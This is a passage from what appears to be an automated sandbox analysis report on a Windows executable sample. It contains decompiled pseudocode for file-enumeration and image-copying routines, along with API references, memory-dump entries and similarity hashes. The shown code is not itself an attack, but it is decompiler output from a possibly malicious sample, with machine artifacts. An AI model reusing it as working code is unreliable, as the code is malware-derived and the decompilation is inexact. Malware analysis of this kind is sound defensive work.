					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
					E004044A8();
					_t38 = _t63;
					_push(_t38);
					_t39 = FindFirstFileA(_t38, _t87); // executed
					_t84 = _t39;
					asm("pushfd");
					E00403094(_t87);
					asm("popfd");
					if(_t39 + 1 != 0) {
						do {
							_t44 = E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4); // executed
							if(_t44 != 0) {
								asm("jecxz 0x16");
								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
								asm("jecxz 0x22");
								asm("loop 0x31");
								_push(E00402448(0x140));
								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
								_pop(_t80);
								_t69 = 0x140;
								E0040254C(_t87, _t69, _t80);
							}
							_t45 = FindNextFileA(_t84, _t87); // executed
						} while (_t45 != 0);
						FindClose(_t84); // executed
					}
				}
				 *((intOrPtr*)(_t60 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
			}


























                                                                                                                          0x00405634
                                                                                                                          0x00405634
                                                                                                                          0x00405634
                                                                                                                          0x00405639
                                                                                                                          0x0040563b
                                                                                                                          0x0040563c
                                                                                                                          0x00405646
                                                                                                                          0x00405649
                                                                                                                          0x0040564a
                                                                                                                          0x0040564b
                                                                                                                          0x0040564e
                                                                                                                          0x00405653
                                                                                                                          0x00405659
                                                                                                                          0x0040565f
                                                                                                                          0x00405660
                                                                                                                          0x00405665
                                                                                                                          0x0040566a
                                                                                                                          0x0040566f
                                                                                                                          0x00405671
                                                                                                                          0x00405676
                                                                                                                          0x00405679
                                                                                                                          0x0040567a
                                                                                                                          0x0040567c
                                                                                                                          0x0040567c
                                                                                                                          0x00405682
                                                                                                                          0x00405689
                                                                                                                          0x0040568a
                                                                                                                          0x0040568c
                                                                                                                          0x0040568c
                                                                                                                          0x00405694
                                                                                                                          0x00405694
                                                                                                                          0x004056a9
                                                                                                                          0x004056aa
                                                                                                                          0x004056b2
                                                                                                                          0x004056b3
                                                                                                                          0x004056b7
                                                                                                                          0x004056c3
                                                                                                                          0x004056c5
                                                                                                                          0x004056ca
                                                                                                                          0x004056cf
                                                                                                                          0x004056d2
                                                                                                                          0x004056d5
                                                                                                                          0x004056da
                                                                                                                          0x004056df
                                                                                                                          0x004056e0
                                                                                                                          0x004056e5
                                                                                                                          0x004056e7
                                                                                                                          0x004056e9
                                                                                                                          0x004056f5
                                                                                                                          0x004056fc
                                                                                                                          0x00405701
                                                                                                                          0x0040570f
                                                                                                                          0x00405713
                                                                                                                          0x00405715
                                                                                                                          0x00405722
                                                                                                                          0x00405727
                                                                                                                          0x0040572c
                                                                                                                          0x0040572d
                                                                                                                          0x00405730
                                                                                                                          0x00405730
                                                                                                                          0x00405737
                                                                                                                          0x0040573c
                                                                                                                          0x00405741
                                                                                                                          0x00405741
                                                                                                                          0x00405746
                                                                                                                          0x0040574e
                                                                                                                          0x00405759

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                                                                          • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                                                                                          • Opcode Fuzzy Hash: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                                                                          • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004056A7, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t14;
				CHAR* _t20;
				void* _t21;
				void* _t29;
				int _t30;
				void* _t41;
				void* _t45;
				void* _t51;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				struct _WIN32_FIND_DATAA* _t68;

				_t64 = __esi;
				_t41 = __ebx;
				_t14 = __eax -  *__eax;
				asm("popad");
				_t68 = _t67 + 0xfffffec0;
				_push(0);
				_push(0);
				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
				_pop(_t45);
				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
				E004044A8();
				_t20 = _t45;
				_push(_t20);
				_t21 = FindFirstFileA(_t20, _t68); // executed
				_t62 = _t21;
				asm("pushfd");
				E00403094(_t68);
				asm("popfd");
				if(_t21 + 1 != 0) {
					do {
						_t29 = E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))); // executed
						if(_t29 != 0) {
							asm("jecxz 0x16");
							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
							asm("jecxz 0x22");
							asm("loop 0x31");
							_push(E00402448(0x140));
							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
							_pop(_t60);
							_t51 = 0x140;
							E0040254C(_t68, _t51, _t60);
						}
						_t30 = FindNextFileA(_t62, _t68); // executed
					} while (_t30 != 0);
					FindClose(_t62); // executed
				}
				 *((intOrPtr*)(_t41 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
			}
















                                                                                                                          0x004056a7
                                                                                                                          0x004056a7
                                                                                                                          0x004056a7
                                                                                                                          0x004056a9
                                                                                                                          0x004056aa
                                                                                                                          0x004056b2
                                                                                                                          0x004056b3
                                                                                                                          0x004056b7
                                                                                                                          0x004056c3
                                                                                                                          0x004056c5
                                                                                                                          0x004056ca
                                                                                                                          0x004056cf
                                                                                                                          0x004056d2
                                                                                                                          0x004056d5
                                                                                                                          0x004056da
                                                                                                                          0x004056df
                                                                                                                          0x004056e0
                                                                                                                          0x004056e5
                                                                                                                          0x004056e7
                                                                                                                          0x004056e9
                                                                                                                          0x004056f5
                                                                                                                          0x004056fc
                                                                                                                          0x00405701
                                                                                                                          0x0040570f
                                                                                                                          0x00405713
                                                                                                                          0x00405715
                                                                                                                          0x00405722
                                                                                                                          0x00405727
                                                                                                                          0x0040572c
                                                                                                                          0x0040572d
                                                                                                                          0x00405730
                                                                                                                          0x00405730
                                                                                                                          0x00405737
                                                                                                                          0x0040573c
                                                                                                                          0x00405741
                                                                                                                          0x00405741
                                                                                                                          0x0040574e
                                                                                                                          0x00405759

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                                                                          • Opcode Fuzzy Hash: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404F6C, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F6C(CHAR* __eax) {
				intOrPtr _v288;
				void* _t3;
				void* _t4;
				struct _WIN32_FIND_DATAA* _t8;

				_t3 = FindFirstFileA(__eax, _t8); // executed
				_t4 = _t3 + 1;
				if(_t4 != 0) {
					FindClose(_t4 - 1); // executed
					return _v288;
				}
				return _t4;
			}







                                                                                                                          0x00404f74
                                                                                                                          0x00404f79
                                                                                                                          0x00404f7a
                                                                                                                          0x00404f7e
                                                                                                                          0x00000000
                                                                                                                          0x00404f83
                                                                                                                          0x00404f8d

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                                                                          • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                                                                                          • Opcode Fuzzy Hash: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                                                                          • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406638, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v14;
				char _v17;
				signed int _v18;
				char _v19;
				int _v20;
				void** _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v33;
				int _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed short _v58;
				short _v60;
				short _v62;
				intOrPtr _v68;
				void* _v72;
				void** _v76;
				void** _v80;
				intOrPtr _v100;
				signed short _v106;
				short _v108;
				int _v112;
				int _v116;
				char _v120;
				short _v126;
				intOrPtr _v128;
				int _v136;
				int _v140;
				void _v144;
				void* __ebp;
				signed int _t138;
				signed int _t139;
				void* _t141;
				unsigned int _t152;
				void* _t154;
				void* _t162;
				void* _t179;
				void* _t181;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t212;
				void* _t214;
				signed int _t220;
				void* _t221;
				void* _t229;
				void* _t232;
				void* _t243;
				void* _t255;
				intOrPtr _t264;
				void* _t274;
				void* _t275;
				int _t293;
				int _t294;
				intOrPtr _t318;
				void* _t324;
				void* _t366;
				void* _t369;
				int _t375;
				int _t376;
				void* _t378;
				void* _t380;
				intOrPtr _t381;

				_t378 = _t380;
				_t381 = _t380 + 0xffffff74;
				_v32 = __ecx;
				_v28 = __edx;
				_v24 = __eax;
				_v33 = 0;
				_v62 = 0;
				_v60 = 1;
				_t138 = _v28 + 1;
				_t139 = _t138 >> 1;
				if(_t138 < 0) {
					asm("adc eax, 0x0");
				}
				_v58 = _t139;
				_t141 = E0040598C(_v32);
				_t384 = _t141 - 6;
				if(_t141 != 6) {
					L59:
					return _v33;
				} else {
					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
					_v68 = E0040456C();
					_v52 = E00405FD8(0, 0, _t384);
					_v56 = E00405FD8(0, 0, _t384);
					_push(_t378);
					_push(0x406b11);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t381;
					_t152 = _v28 >> 1;
					if(_t152 < 0) {
						L22:
						_t154 = _v28 >> 1;
						__eflags = _t154;
						if(_t154 < 0) {
							L57:
							__eflags = 0;
							_pop(_t318);
							 *[fs:eax] = _t318;
							_push(E00406B18);
							E00404520(_v68);
							E00404520(_v52);
							return E00404520(_v56);
						} else {
							_t162 = _t154 + 1;
							__eflags = _t162;
							_v72 = _t162;
							_v40 = 0;
							_v80 = _v24;
							do {
								_t366 =  *_v80;
								_v48 = _v80[1];
								__eflags = _t366;
								if(_t366 != 0) {
									L26:
									GetObjectA(_v48, 0x18,  &_v144);
									_t293 = _v140;
									_t375 = _v136;
									E00402660( &_v120, 0x28);
									_v120 = 0x28;
									_v116 = _t293;
									_v112 = _t375;
									__eflags = _t366;
									if(_t366 != 0) {
										_t243 = _t293 + _t293;
										__eflags = _t243;
										_v112 = _t243;
									}
									_v108 = 1;
									_v18 = E0040465C(_v68, _v40);
									__eflags = _v14;
									if(_v14 == 0) {
										_v14 = E00406580(_v18 & 0x0000ffff);
									}
									_v106 = _v14;
									_push(E004065CC(_t293, _t375, _t378) + 0x28);
									_t179 = E00406624(_t293, _t375);
									_pop(_t324);
									_v100 = _t324 + _t179;
									_t181 = E0040598C(_v32);
									__eflags = _t181 - 0x28;
									if(_t181 == 0x28) {
										__eflags = _t366;
										if(__eflags == 0) {
											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v52, 0x28, 1, _t378, __eflags);
										} else {
											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
											_t220 = _v106 & 0x0000ffff;
											__eflags = _t220 - 0x10;
											if(__eflags > 0) {
												_t221 = _t220 - 0x18;
												__eflags = _t221;
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 6, _t378, __eflags);
												} else {
													__eflags = _t221 - 8;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 7, _t378, __eflags);
													}
												}
											} else {
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 5, _t378, __eflags);
												} else {
													_t229 = _t220 - 1;
													__eflags = _t229;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 1, _t378, __eflags);
													} else {
														_t232 = _t229 - 3;
														__eflags = _t232;
														if(__eflags == 0) {
															E00406218(_v52, 0x28, 2, _t378, __eflags);
														} else {
															__eflags = _t232 - 4;
															if(__eflags == 0) {
																E00406218(_v52, 0x28, 3, _t378, __eflags);
															}
														}
													}
												}
											}
										}
										__eflags =  *(_v52 + 0x41);
										if(__eflags == 0) {
											L54:
											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v56, 0x28, 1, _t378, __eflags);
											E00406624(_t293, _t375);
											_t199 = E0040598C(_v32);
											_t201 = E00406624(_t293, _t375);
											__eflags = _t199 - _t201;
											if(_t199 == _t201) {
												goto L56;
											} else {
												E00402BEC();
												goto L59;
											}
										} else {
											_t207 = E0040598C(_v32);
											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
											if(_t207 == (_v18 & 0x0000ffff) << 2) {
												E004065CC(_t293, _t375, _t378);
												_t212 = E0040598C(_v32);
												_t214 = E004065CC(_t293, _t375, _t378);
												_pop(0x28);
												__eflags = _t212 - _t214;
												if(__eflags == 0) {
													goto L54;
												} else {
													E00402BEC();
													goto L59;
												}
											} else {
												E00402BEC();
												goto L59;
											}
										}
									} else {
										E00402BEC();
										goto L59;
									}
								} else {
									__eflags = _v48;
									if(_v48 == 0) {
										goto L57;
									} else {
										goto L26;
									}
								}
								goto L60;
								L56:
								_v40 = _v40 + 1;
								_v80 =  &(_v80[2]);
								_t130 =  &_v72;
								 *_t130 = _v72 - 1;
								__eflags =  *_t130;
							} while ( *_t130 != 0);
							goto L57;
						}
					} else {
						_v72 = _t152 + 1;
						_v76 = _v24;
						while(1) {
							_t369 =  *_v76;
							_v48 = _v76[1];
							if(_t369 == 0 && _v48 == 0) {
								goto L22;
							}
							GetObjectA(_v48, 0x18,  &_v144);
							_t294 = _v140;
							_t376 = _v136;
							if(_t369 != 0) {
								GetObjectA(_t369, 0x18,  &_v144);
							}
							E00402660( &_v20, 0x10);
							_v20 = _t294;
							_v19 = _t376;
							if(_t369 != 0) {
								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
								E004061E0(_v52, _t255, __eflags);
								E00402660( &_v120, 0x28);
								_v120 = 0x28;
								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
								_t264 = _v128;
								__eflags = _t264 - 1;
								if(_t264 != 1) {
									L14:
									_t310 = _v126;
									__eflags = 1 - 0x10;
									if(1 >= 0x10) {
										__eflags = 1 - 0x100;
										if(1 >= 0x100) {
											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
											_v18 = 0;
											_v17 = 1;
										} else {
											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
											_v18 = 0x10;
										}
									} else {
										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
										_v18 = 2;
									}
								} else {
									__eflags = _v126 - 0xf;
									if(_v126 < 0xf) {
										goto L14;
									} else {
										_v18 = 0;
										_v17 = 0;
										_v14 = _v126;
									}
								}
							} else {
								_v18 = 2;
							}
							E004045E8(_v68, 0xbadbad);
							_t274 = E004065CC(_t294, _t376, _t378);
							_t275 = E00406598(_t378);
							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
							_v8 = _v44;
							if(E0040598C(_v32) == 0x10) {
								_v44 = _v44 + _v12;
								_v76 =  &(_v76[2]);
								_t66 =  &_v72;
								 *_t66 = _v72 - 1;
								__eflags =  *_t66;
								if( *_t66 != 0) {
									continue;
								} else {
									goto L22;
								}
							} else {
								E00402BEC();
								goto L59;
							}
							goto L60;
						}
						goto L22;
					}
				}
				L60:
			}







































































                                                                                                                          0x00406639
                                                                                                                          0x0040663b
                                                                                                                          0x00406644
                                                                                                                          0x00406647
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406651
                                                                                                                          0x00406657
                                                                                                                          0x00406660
                                                                                                                          0x00406661
                                                                                                                          0x00406663
                                                                                                                          0x00406665
                                                                                                                          0x00406665
                                                                                                                          0x00406668
                                                                                                                          0x00406677
                                                                                                                          0x0040667c
                                                                                                                          0x0040667f
                                                                                                                          0x00406b1c
                                                                                                                          0x00406b25
                                                                                                                          0x00406685
                                                                                                                          0x0040668f
                                                                                                                          0x00406697
                                                                                                                          0x004066a3
                                                                                                                          0x004066af
                                                                                                                          0x004066b4
                                                                                                                          0x004066b5
                                                                                                                          0x004066ba
                                                                                                                          0x004066bd
                                                                                                                          0x004066c3
                                                                                                                          0x004066c7
                                                                                                                          0x00406877
                                                                                                                          0x0040687a
                                                                                                                          0x0040687c
                                                                                                                          0x0040687e
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aed
                                                                                                                          0x00406af0
                                                                                                                          0x00406af3
                                                                                                                          0x00406afb
                                                                                                                          0x00406b03
                                                                                                                          0x00406b10
                                                                                                                          0x00406884
                                                                                                                          0x00406884
                                                                                                                          0x00406884
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x00406892
                                                                                                                          0x00406895
                                                                                                                          0x00406898
                                                                                                                          0x004068a0
                                                                                                                          0x004068a3
                                                                                                                          0x004068a5
                                                                                                                          0x004068b1
                                                                                                                          0x004068be
                                                                                                                          0x004068c3
                                                                                                                          0x004068c9
                                                                                                                          0x004068d9
                                                                                                                          0x004068de
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ed
                                                                                                                          0x004068f1
                                                                                                                          0x004068f1
                                                                                                                          0x004068f3
                                                                                                                          0x004068f3
                                                                                                                          0x004068f6
                                                                                                                          0x0040690a
                                                                                                                          0x0040690d
                                                                                                                          0x00406912
                                                                                                                          0x0040691f
                                                                                                                          0x0040691f
                                                                                                                          0x00406927
                                                                                                                          0x00406939
                                                                                                                          0x0040693e
                                                                                                                          0x00406943
                                                                                                                          0x00406946
                                                                                                                          0x00406954
                                                                                                                          0x00406959
                                                                                                                          0x0040695c
                                                                                                                          0x00406968
                                                                                                                          0x0040696a
                                                                                                                          0x00406a08
                                                                                                                          0x00406a12
                                                                                                                          0x00406970
                                                                                                                          0x00406981
                                                                                                                          0x00406986
                                                                                                                          0x0040698a
                                                                                                                          0x0040698d
                                                                                                                          0x004069a0
                                                                                                                          0x004069a0
                                                                                                                          0x004069a3
                                                                                                                          0x004069e1
                                                                                                                          0x004069a5
                                                                                                                          0x004069a5
                                                                                                                          0x004069a8
                                                                                                                          0x004069ed
                                                                                                                          0x004069ed
                                                                                                                          0x004069a8
                                                                                                                          0x0040698f
                                                                                                                          0x0040698f
                                                                                                                          0x004069d5
                                                                                                                          0x00406991
                                                                                                                          0x00406991
                                                                                                                          0x00406991
                                                                                                                          0x00406992
                                                                                                                          0x004069b1
                                                                                                                          0x00406994
                                                                                                                          0x00406994
                                                                                                                          0x00406994
                                                                                                                          0x00406997
                                                                                                                          0x004069bd
                                                                                                                          0x00406999
                                                                                                                          0x00406999
                                                                                                                          0x0040699c
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x0040699c
                                                                                                                          0x00406997
                                                                                                                          0x00406992
                                                                                                                          0x0040698f
                                                                                                                          0x0040698d
                                                                                                                          0x00406a1a
                                                                                                                          0x00406a1e
                                                                                                                          0x00406a89
                                                                                                                          0x00406a9d
                                                                                                                          0x00406aa7
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ac0
                                                                                                                          0x00406acb
                                                                                                                          0x00406ad0
                                                                                                                          0x00406ad2
                                                                                                                          0x00000000
                                                                                                                          0x00406ad4
                                                                                                                          0x00406ad4
                                                                                                                          0x00000000
                                                                                                                          0x00406ad4
                                                                                                                          0x00406a20
                                                                                                                          0x00406a37
                                                                                                                          0x00406a45
                                                                                                                          0x00406a47
                                                                                                                          0x00406a58
                                                                                                                          0x00406a69
                                                                                                                          0x00406a75
                                                                                                                          0x00406a7a
                                                                                                                          0x00406a7b
                                                                                                                          0x00406a7d
                                                                                                                          0x00000000
                                                                                                                          0x00406a7f
                                                                                                                          0x00406a7f
                                                                                                                          0x00000000
                                                                                                                          0x00406a7f
                                                                                                                          0x00406a49
                                                                                                                          0x00406a49
                                                                                                                          0x00000000
                                                                                                                          0x00406a49
                                                                                                                          0x00406a47
                                                                                                                          0x0040695e
                                                                                                                          0x0040695e
                                                                                                                          0x00000000
                                                                                                                          0x0040695e
                                                                                                                          0x004068a7
                                                                                                                          0x004068a7
                                                                                                                          0x004068ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004068ab
                                                                                                                          0x00000000
                                                                                                                          0x00406adb
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00000000
                                                                                                                          0x00406895
                                                                                                                          0x004066cd
                                                                                                                          0x004066ce
                                                                                                                          0x004066d4
                                                                                                                          0x004066d7
                                                                                                                          0x004066da
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406700
                                                                                                                          0x00406705
                                                                                                                          0x0040670b
                                                                                                                          0x00406713
                                                                                                                          0x0040671f
                                                                                                                          0x0040671f
                                                                                                                          0x0040672e
                                                                                                                          0x00406733
                                                                                                                          0x00406738
                                                                                                                          0x0040673d
                                                                                                                          0x00406752
                                                                                                                          0x0040675c
                                                                                                                          0x0040676b
                                                                                                                          0x00406770
                                                                                                                          0x00406789
                                                                                                                          0x0040678e
                                                                                                                          0x00406792
                                                                                                                          0x00406796
                                                                                                                          0x004067b1
                                                                                                                          0x004067b1
                                                                                                                          0x004067c2
                                                                                                                          0x004067c5
                                                                                                                          0x004067d7
                                                                                                                          0x004067dd
                                                                                                                          0x004067f4
                                                                                                                          0x004067f9
                                                                                                                          0x004067fd
                                                                                                                          0x004067df
                                                                                                                          0x004067e4
                                                                                                                          0x004067e9
                                                                                                                          0x004067e9
                                                                                                                          0x004067c7
                                                                                                                          0x004067cc
                                                                                                                          0x004067d1
                                                                                                                          0x004067d1
                                                                                                                          0x00406798
                                                                                                                          0x00406798
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679f
                                                                                                                          0x0040679f
                                                                                                                          0x004067a3
                                                                                                                          0x004067ab
                                                                                                                          0x004067ab
                                                                                                                          0x0040679d
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x00406813
                                                                                                                          0x0040681d
                                                                                                                          0x00406826
                                                                                                                          0x0040683c
                                                                                                                          0x00406842
                                                                                                                          0x00406858
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x00406858
                                                                                                                          0x00000000
                                                                                                                          0x004066d7
                                                                                                                          0x004066c7
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                                                                          • CopyImage.USER32 ref: 00406977
                                                                                                                          • CopyImage.USER32 ref: 004069FE
                                                                                                                          • CopyImage.USER32 ref: 00406752
                                                                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                                                                            • Part of subcall function 00406154: 73BBAC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                                                                            • Part of subcall function 00406154: 73BBA7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                                                                            • Part of subcall function 00406154: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                                                                          • CopyImage.USER32 ref: 00406A93
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

